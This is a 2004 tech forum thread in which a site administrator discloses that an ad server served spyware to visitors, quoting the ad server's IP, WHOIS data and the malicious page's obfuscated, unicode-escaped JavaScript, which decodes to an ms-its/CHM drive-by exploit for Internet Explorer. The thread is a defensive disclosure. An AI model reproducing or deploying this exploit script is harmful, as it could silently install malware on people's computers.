Ad provider change & Info on Spyware


Recommended Posts

ok first off I want to thank Adster. We had some pretty heated discussion on the method of his postings but I am now convinced he was helping, and he did.. Heres what we found out:

I got the PM from Adster and he is correct that an adserver is loading spyware on members PC's I can't however trace the IP to a single advertiser.

The IP is 69.50.139.61 and the url is 69.50.139.61/hp1/hp1.htm (url disabled, don't access it on an unprotected PC please) it contains java script:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

<script type="text/javascript">document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u000d\u000a')</script>

if you browse to the root folders you get the message: This is an adserver. Please contact advertisers directly

So I think we can safely say this does come from one of our advertisers. I have blocked the IP in cPanel..

a WHOIS returns very little information:

NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)

                                    69.50.128.0 - 69.50.143.255

OMEGABYTE Computer Corporation MACH10-OMEGA1 (NET-69-50-139-0-1)

                                    69.50.139.0 - 69.50.139.127

 

# ARIN WHOIS database, last updated 2004-04-20 20:01

# Enter ? for additional hints on searching ARIN's WHOIS database.

and now for the bad news..

http://www.google.nl/search?num=20&hl=en&i...Inc&btnG=Search

NationalNet Inc is a large Adult hosting company, so this makes me wonder what they are doing to with our webviews and why they are involved with one of our ad companies!

As a result we have disabled ALL 468x60 ads and become a member of Google AdSense (which are now displaying all 468x60 ads on Neowin). We can be sure the ads they deliver will not attempt to load spyware on your PC. The intelliText on the main page, AdSquares and towers remain (also not on the forums anyway) Google AdSense also has the option to deliver feedback if you click the Ads by Google link.

I want to thank everyone who helped us get to the bottom of this the only negative side to this is that we couldn't find out which advertiser controls that IP (all our advertisers deny being involved with Spyware)

Link to comment
https://www.neowin.net/forum/topic/159695-ad-provider-change-info-on-spyware/
Share on other sites

It's me again! :p

I just wanted to thank Neobond for nipping this thing before the problem became more widespread. He's a great Admin. Thumbs up to you! (Y)

On a side note, one more thing about that trojan that I didn't realize earlier. It replaces wmplayer.exe with an installation file so when you try to open a video or audio file that opens in Windows Media Player, it downloads more spyware instead. To fix that, run wm_setup.exe in the same directory (usually C:\Program Files\Windows Media Player) and it will re-download the original wmplayer.exe file.

Once again, thanks Neobond!

the google adds may not be as relevent as they could be...

Longhorn Texas

Compare and buy it on eBay. Thousands of new & used items!

Methinks Keywords should be re-thought

I thought I asked people not to whine about the ads. How many times do I have to say that we need them, do you think I want them?

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Look who's back!
    • I wonder how driving laws around the world will change. No way to really tell if people are using phone. Same with smart watches i guess even now and those silly built in tablets for controlling the car instead of buttons.
    • They found a better aligned evil overlord for WhatsApp...
    • Google Chrome 149.0.7827.197 (offline installer) by Razvan Serea The web browser is arguably the most important piece of software on your computer. You spend much of your time online inside a browser: when you search, chat, email, shop, bank, read the news, and watch videos online, you often do all this using a browser. Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier. Use one box for everything--type in the address bar and get suggestions for both search and Web pages. Thumbnails of your top sites let you access your favorite pages instantly with lightning speed from any new tab. Desktop shortcuts allow you to launch your favorite Web apps straight from your desktop. Chrome has many useful features built in, including automatic full-page translation and access to thousands of apps, extensions, and themes from the Chrome Web Store. Google Chrome is one of the best solutions for Internet browsing giving you high level of security, speed and great features. Important to know! The offline installer links do not include the automatic update feature. Download web installer: Google Chrome Web 32-bit | Google Chrome 64-bit | Freeware Download: Google Chrome Offline Installer 64-bit | Direct Link | 131.0 MB Download: Google Chrome Offline Installer 32-bit | Direct Link | 119.0 MB Download page: Google Chrome Portable Download: Chrome ARM64 | Direct Link View: Chrome Website | Release Notes Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • (I know it's just an image and also not the point at all, but it really bugs me that the two halves of the necklace don't really fit together... 😅)
  • Recent Achievements

    • Rookie
      DaviKar went up a rank
      Rookie
    • Dedicated
      HidekoYamamoto94 earned a badge
      Dedicated
    • One Month Later
      timbobit earned a badge
      One Month Later
    • One Month Later
      nates earned a badge
      One Month Later
    • Week One Done
      Almohandis earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      463
    2. 2
      +Edouard
      161
    3. 3
      PsYcHoKiLLa
      112
    4. 4
      Michael Scrip
      85
    5. 5
      Steven P.
      70
  • Tell a friend

    Love Neowin? Tell a friend!